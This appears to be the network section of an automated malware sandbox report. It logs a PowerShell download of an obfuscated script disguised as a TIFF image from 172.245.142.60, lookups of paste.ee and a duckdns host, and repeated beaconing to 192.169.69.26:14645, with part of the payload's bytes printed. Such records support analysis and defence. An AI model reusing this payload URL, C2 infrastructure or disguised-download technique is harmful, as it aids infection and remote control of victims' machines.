                                                                                                          Dec 11, 2024 11:23:30.978604078 CET49759443192.168.2.6104.21.84.67
                                                                                                          Dec 11, 2024 11:23:30.984980106 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:30.984996080 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:30.985044956 CET49759443192.168.2.6104.21.84.67
                                                                                                          Dec 11, 2024 11:23:30.985049963 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:30.985083103 CET49759443192.168.2.6104.21.84.67
                                                                                                          Dec 11, 2024 11:23:31.145731926 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:31.145750999 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:31.145823956 CET49759443192.168.2.6104.21.84.67
                                                                                                          Dec 11, 2024 11:23:31.145831108 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:31.145864010 CET49759443192.168.2.6104.21.84.67
                                                                                                          Dec 11, 2024 11:23:31.152124882 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:31.152142048 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:31.152215958 CET49759443192.168.2.6104.21.84.67
                                                                                                          Dec 11, 2024 11:23:31.152221918 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:31.152259111 CET49759443192.168.2.6104.21.84.67
                                                                                                          Dec 11, 2024 11:23:31.158659935 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:31.158674002 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:31.158734083 CET49759443192.168.2.6104.21.84.67
                                                                                                          Dec 11, 2024 11:23:31.158739090 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:31.158775091 CET49759443192.168.2.6104.21.84.67
                                                                                                          Dec 11, 2024 11:23:31.159666061 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:31.159744024 CET49759443192.168.2.6104.21.84.67
                                                                                                          Dec 11, 2024 11:23:31.159746885 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:31.159756899 CET44349759104.21.84.67192.168.2.6
                                                                                                          Dec 11, 2024 11:23:31.159811020 CET49759443192.168.2.6104.21.84.67
                                                                                                          Dec 11, 2024 11:23:31.160083055 CET49759443192.168.2.6104.21.84.67
                                                                                                          Dec 11, 2024 11:23:31.564035892 CET4976514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:23:31.683322906 CET1464549765192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:23:31.683394909 CET4976514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:23:31.688806057 CET4976514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:23:31.808082104 CET1464549765192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:23:42.070377111 CET1464549765192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:23:42.070450068 CET4976514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:23:42.070512056 CET4976514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:23:42.190222979 CET1464549765192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:23:43.082679987 CET4979314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:23:43.201888084 CET1464549793192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:23:43.205301046 CET4979314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:23:43.209165096 CET4979314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:23:43.328870058 CET1464549793192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:23:53.595571041 CET1464549793192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:23:53.595653057 CET4979314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:23:53.595738888 CET4979314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:23:53.715135098 CET1464549793192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:23:54.598953009 CET4982314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:23:54.720889091 CET1464549823192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:23:54.720973015 CET4982314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:23:54.724672079 CET4982314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:23:54.846652985 CET1464549823192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:05.016730070 CET1464549823192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:05.016799927 CET4982314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:05.016880989 CET4982314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:05.136909008 CET1464549823192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:06.020045042 CET4985114645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:06.139286995 CET1464549851192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:06.139393091 CET4985114645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:06.142915010 CET4985114645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:06.262202024 CET1464549851192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:16.489042997 CET1464549851192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:16.489152908 CET4985114645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:16.489206076 CET4985114645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:16.608452082 CET1464549851192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:17.504466057 CET4987914645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:17.623851061 CET1464549879192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:17.623946905 CET4987914645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:17.627537966 CET4987914645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:17.746767998 CET1464549879192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:27.937653065 CET1464549879192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:27.937721014 CET4987914645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:27.937803984 CET4987914645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:28.057050943 CET1464549879192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:28.942044973 CET4990714645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:29.061393023 CET1464549907192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:29.061511040 CET4990714645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:29.065036058 CET4990714645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:29.184242010 CET1464549907192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:39.404371023 CET1464549907192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:39.404581070 CET4990714645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:39.404778957 CET4990714645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:39.523992062 CET1464549907192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:40.719368935 CET4993814645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:40.838622093 CET1464549938192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:40.838798046 CET4993814645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:40.842042923 CET4993814645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:40.961318970 CET1464549938192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:51.201549053 CET1464549938192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:51.203478098 CET4993814645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:51.203533888 CET4993814645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:51.325159073 CET1464549938192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:52.214627028 CET4996514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:52.333941936 CET1464549965192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:24:52.334055901 CET4996514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:52.337785006 CET4996514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:24:52.458472967 CET1464549965192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:02.709534883 CET1464549965192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:02.711339951 CET4996514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:02.711384058 CET4996514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:02.830620050 CET1464549965192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:03.723120928 CET4999214645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:03.842499971 CET1464549992192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:03.842622995 CET4999214645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:03.846136093 CET4999214645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:03.965517044 CET1464549992192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:14.226075888 CET1464549992192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:14.227524996 CET4999214645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:14.227583885 CET4999214645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:14.346935987 CET1464549992192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:15.239197016 CET5000314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:15.359322071 CET1464550003192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:15.359402895 CET5000314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:15.364419937 CET5000314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:15.484486103 CET1464550003192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:25.659322023 CET1464550003192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:25.659400940 CET5000314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:25.659482956 CET5000314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:25.779649019 CET1464550003192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:26.661173105 CET5000414645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:26.782011032 CET1464550004192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:26.782121897 CET5000414645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:26.786104918 CET5000414645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:26.907141924 CET1464550004192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:37.107477903 CET1464550004192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:37.107533932 CET5000414645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:37.107603073 CET5000414645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:37.226872921 CET1464550004192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:38.113964081 CET5000614645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:38.237839937 CET1464550006192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:38.237910032 CET5000614645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:38.242049932 CET5000614645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:38.362637043 CET1464550006192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:48.643724918 CET1464550006192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:48.643825054 CET5000614645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:48.643910885 CET5000614645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:48.763151884 CET1464550006192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:49.980026960 CET5000814645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:50.099287033 CET1464550008192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:25:50.099359989 CET5000814645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:50.102833986 CET5000814645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:25:50.222146034 CET1464550008192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:00.423644066 CET1464550008192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:00.424029112 CET5000814645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:00.424029112 CET5000814645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:00.544397116 CET1464550008192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:01.426481962 CET5000914645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:01.546123028 CET1464550009192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:01.546248913 CET5000914645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:01.549504995 CET5000914645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:01.670239925 CET1464550009192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:11.961014986 CET1464550009192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:11.961119890 CET5000914645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:11.961205959 CET5000914645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:12.080460072 CET1464550009192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:12.973351002 CET5001014645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:13.092670918 CET1464550010192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:13.093414068 CET5001014645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:13.096757889 CET5001014645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:13.215982914 CET1464550010192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:23.538032055 CET1464550010192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:23.541404963 CET5001014645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:23.541588068 CET5001014645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:23.660825014 CET1464550010192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:24.551435947 CET5001214645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:24.670722961 CET1464550012192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:24.670840979 CET5001214645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:24.674367905 CET5001214645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:24.793827057 CET1464550012192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:35.054543018 CET1464550012192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:35.057420969 CET5001214645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:35.057482958 CET5001214645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:35.176939964 CET1464550012192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:36.067084074 CET5001314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:36.186618090 CET1464550013192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:36.186691046 CET5001314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:36.190004110 CET5001314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:36.309595108 CET1464550013192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:46.560415030 CET1464550013192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:46.560481071 CET5001314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:46.560518026 CET5001314645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:46.679815054 CET1464550013192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:47.567950010 CET5001514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:47.687238932 CET1464550015192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:47.687482119 CET5001514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:47.715496063 CET5001514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:47.834832907 CET1464550015192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:57.998961926 CET1464550015192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:57.999069929 CET5001514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:57.999144077 CET5001514645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:58.118623972 CET1464550015192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:59.330111027 CET5001614645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:59.449806929 CET1464550016192.169.69.26192.168.2.6
                                                                                                          Dec 11, 2024 11:26:59.449878931 CET5001614645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:59.454045057 CET5001614645192.168.2.6192.169.69.26
                                                                                                          Dec 11, 2024 11:26:59.573400021 CET1464550016192.169.69.26192.168.2.6
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 11, 2024 11:23:07.657213926 CET4998753192.168.2.61.1.1.1
                                                                                                          Dec 11, 2024 11:23:07.954875946 CET53499871.1.1.1192.168.2.6
                                                                                                          Dec 11, 2024 11:23:27.635417938 CET5094353192.168.2.61.1.1.1
                                                                                                          Dec 11, 2024 11:23:28.117750883 CET53509431.1.1.1192.168.2.6
                                                                                                          Dec 11, 2024 11:23:31.225924969 CET5271753192.168.2.61.1.1.1
                                                                                                          Dec 11, 2024 11:23:31.560018063 CET53527171.1.1.1192.168.2.6
                                                                                                          Dec 11, 2024 11:24:40.410929918 CET4938653192.168.2.61.1.1.1
                                                                                                          Dec 11, 2024 11:24:40.712699890 CET53493861.1.1.1192.168.2.6
                                                                                                          Dec 11, 2024 11:25:49.661032915 CET6014353192.168.2.61.1.1.1
                                                                                                          Dec 11, 2024 11:25:49.978899002 CET53601431.1.1.1192.168.2.6
                                                                                                          Dec 11, 2024 11:26:59.004406929 CET5449253192.168.2.61.1.1.1
                                                                                                          Dec 11, 2024 11:26:59.325905085 CET53544921.1.1.1192.168.2.6
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Dec 11, 2024 11:23:07.657213926 CET192.168.2.61.1.1.10xb60Standard query (0)res.cloudinary.comA (IP address)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:23:27.635417938 CET192.168.2.61.1.1.10x8388Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:23:31.225924969 CET192.168.2.61.1.1.10x5669Standard query (0)rmcnewprojectadd.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:24:40.410929918 CET192.168.2.61.1.1.10x5504Standard query (0)rmcnewprojectadd.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:25:49.661032915 CET192.168.2.61.1.1.10xb59bStandard query (0)rmcnewprojectadd.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:26:59.004406929 CET192.168.2.61.1.1.10xacdaStandard query (0)rmcnewprojectadd.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Dec 11, 2024 11:23:07.954875946 CET1.1.1.1192.168.2.60xb60No error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:23:07.954875946 CET1.1.1.1192.168.2.60xb60No error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:23:07.954875946 CET1.1.1.1192.168.2.60xb60No error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:23:07.954875946 CET1.1.1.1192.168.2.60xb60No error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:23:07.954875946 CET1.1.1.1192.168.2.60xb60No error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:23:28.117750883 CET1.1.1.1192.168.2.60x8388No error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:23:28.117750883 CET1.1.1.1192.168.2.60x8388No error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:23:31.560018063 CET1.1.1.1192.168.2.60x5669No error (0)rmcnewprojectadd.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:24:40.712699890 CET1.1.1.1192.168.2.60x5504No error (0)rmcnewprojectadd.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:25:49.978899002 CET1.1.1.1192.168.2.60xb59bNo error (0)rmcnewprojectadd.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                                                          Dec 11, 2024 11:26:59.325905085 CET1.1.1.1192.168.2.60xacdaNo error (0)rmcnewprojectadd.duckdns.org192.169.69.26A (IP address)IN (0x0001)false
                                                                                                          • res.cloudinary.com
                                                                                                          • paste.ee
                                                                                                          • 172.245.142.60
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.649707172.245.142.60804824C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Dec 11, 2024 11:23:01.459352016 CET343OUTGET /551/sheismygirlwholovedmealotstillalsoshelovesmetrulyfromtheheart.tIF HTTP/1.1
                                                                                                          Accept: */*
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                          Host: 172.245.142.60
                                                                                                          Connection: Keep-Alive
                                                                                                          Dec 11, 2024 11:23:02.599783897 CET1236INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 11 Dec 2024 10:23:02 GMT
                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                          Last-Modified: Mon, 09 Dec 2024 08:27:27 GMT
                                                                                                          ETag: "25960-628d22283020e"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 153952
                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: image/tiff
                                                                                                          Data Raw: ff fe 0d 00 0a 00 20 00 20 00 20 00 20 00 0d 00 0a 00 50 00 74 00 75 00 4f 00 71 00 6f 00 66 00 65 00 63 00 64 00 47 00 6b 00 48 00 4c 00 74 00 20 00 3d 00 20 00 22 00 63 00 49 00 6b 00 52 00 4e 00 72 00 57 00 57 00 7a 00 6e 00 64 00 75 00 78 00 70 00 42 00 22 00 0d 00 0a 00 6e 00 47 00 54 00 7a 00 4c 00 70 00 4b 00 69 00 63 00 71 00 70 00 74 00 69 00 61 00 6b 00 20 00 3d 00 20 00 22 00 47 00 55 00 4b 00 65 00 57 00 4c 00 70 00 75 00 65 00 6a 00 63 00 71 00 6c 00 65 00 4b 00 22 00 0d 00 0a 00 65 00 4c 00 65 00 6a 00 4c 00 41 00 57 00 55 00 6b 00 47 00 42 00 47 00 57 00 62 00 4c 00 20 00 3d 00 20 00 22 00 57 00 63 00 54 00 57 00 4c 00 6c 00 62 00 69 00 4b 00 57 00 69 00 6d 00 4a 00 6d 00 4f 00 22 00 0d 00 0a 00 0d 00 0a 00 4b 00 4e 00 6b 00 55 00 6e 00 7a 00 57 00 6f 00 75 00 68 00 51 00 4b 00 43 00 6f 00 57 00 20 00 3d 00 20 00 22 00 4f 00 7a 00 6f 00 47 00 41 00 6b 00 70 00 61 00 52 00 67 00 68 00 50 00 69 00 64 00 6c 00 22 00 0d 00 0a 00 6c 00 6b 00 52 00 68 00 6d 00 54 00 69 00 75 00 69 00 78 00 [TRUNCATED]
                                                                                                          Data Ascii: PtuOqofecdGkHLt = "cIkRNrWWznduxpB"nGTzLpKicqptiak = "GUKeWLpuejcqleK"eLejLAWUkGBGWbL = "WcTWLlbiKWimJmO"KNkUnzWouhQKCoW = "OzoGAkpaRghPidl"lkRhmTiuixBLfxb = "PLnGekqaInWfiLa"NctUWsCbBLlmLJH = "tiGWWnmUoLkLKeQ"WiIKlniKljpAkGZ = "GiNkoBUxLcsWbLZ"cWeqBLoozjKtoLQ = "nipZiWjKLzmGWAv"WBoqiQliWCWlhik = "OAGWKmZSLcxUrWd"bALULqGxLWfuzmk = "lbmcWGAOZAmipcK"epLlxrKNKskhAUU = "LcKiKiizJNaoCbS"lkLhaPOnKhujfkh = "LhPCTeLZmnkGuZn"JGiLcC
                                                                                                          Dec 11, 2024 11:23:02.599812031 CET1236INData Raw: 00 66 00 47 00 4b 00 4e 00 43 00 74 00 74 00 65 00 6b 00 20 00 3d 00 20 00 22 00 57 00 69 00 69 00 57 00 7a 00 57 00 62 00 6b 00 42 00 50 00 62 00 6f 00 47 00 61 00 63 00 22 00 0d 00 0a 00 50 00 6d 00 4c 00 57 00 66 00 53 00 6b 00 53 00 69 00 52
                                                                                                          Data Ascii: fGKNCttek = "WiiWzWbkBPboGac"PmLWfSkSiRLmLKn = "BWGiWodLzmipzii"KGfGcjUZehKqnGm = "KZemAWKKnQNcLiP"kUIoeWZBWiczAL
                                                                                                          Dec 11, 2024 11:23:02.599828959 CET448INData Raw: 00 6f 00 50 00 50 00 4c 00 61 00 4e 00 22 00 0d 00 0a 00 47 00 41 00 4c 00 51 00 63 00 47 00 63 00 63 00 41 00 62 00 4c 00 4c 00 4c 00 63 00 57 00 20 00 3d 00 20 00 22 00 69 00 62 00 47 00 6d 00 55 00 74 00 6d 00 4c 00 7a 00 4f 00 6b 00 55 00 47
                                                                                                          Data Ascii: oPPLaN"GALQcGccAbLLLcW = "ibGmUtmLzOkUGqm"mIARWGULAqBAKiN = "GbCjoNZnRkmWIeL"GRhiIiuqkAiHcZh = "cjlichoNLLdiazg"n
                                                                                                          Dec 11, 2024 11:23:02.599963903 CET1236INData Raw: 00 69 00 4f 00 57 00 63 00 55 00 4c 00 22 00 0d 00 0a 00 57 00 4e 00 68 00 75 00 57 00 4f 00 61 00 62 00 54 00 50 00 6f 00 70 00 4f 00 67 00 4b 00 20 00 3d 00 20 00 22 00 4c 00 61 00 4c 00 63 00 6d 00 4c 00 4b 00 63 00 70 00 64 00 6e 00 6d 00 4b
                                                                                                          Data Ascii: iOWcUL"WNhuWOabTPopOgK = "LaLcmLKcpdnmKRh"nbGRHLqRfzsHskK = "ieKsdiLATGiIKcA"GRmKIAzziiacczU = "LuizPcLGNpWmLtn"S
                                                                                                          Dec 11, 2024 11:23:02.599980116 CET1236INData Raw: 00 20 00 3d 00 20 00 22 00 6d 00 4c 00 65 00 67 00 69 00 69 00 75 00 53 00 41 00 57 00 6d 00 70 00 57 00 4b 00 4b 00 22 00 0d 00 0a 00 4e 00 4c 00 5a 00 4c 00 69 00 4f 00 57 00 4c 00 66 00 55 00 4c 00 50 00 78 00 5a 00 41 00 20 00 3d 00 20 00 22
                                                                                                          Data Ascii: = "mLegiiuSAWmpWKK"NLZLiOWLfULPxZA = "bBqldNcoGGbZzpm"oOZfLWiWRtRKmvN = "bGvcLANWWLkLkLW"LOdLjmCGKkofPah = "PzrZ
                                                                                                          Dec 11, 2024 11:23:02.599987030 CET1236INData Raw: 00 6b 00 4c 00 69 00 64 00 6c 00 57 00 5a 00 70 00 6d 00 7a 00 55 00 6e 00 5a 00 63 00 4b 00 20 00 3d 00 20 00 22 00 70 00 69 00 62 00 6c 00 47 00 78 00 4c 00 57 00 62 00 5a 00 4f 00 50 00 65 00 55 00 4f 00 22 00 0d 00 0a 00 41 00 72 00 68 00 4c
                                                                                                          Data Ascii: kLidlWZpmzUnZcK = "piblGxLWbZOPeUO"ArhLiCKLGiQlLHU = "maqiIGTkzppWLfk"WpUPGGUWtLdnNLz = "mzOAIWtWNBNRmkm"TLJCJCelLU
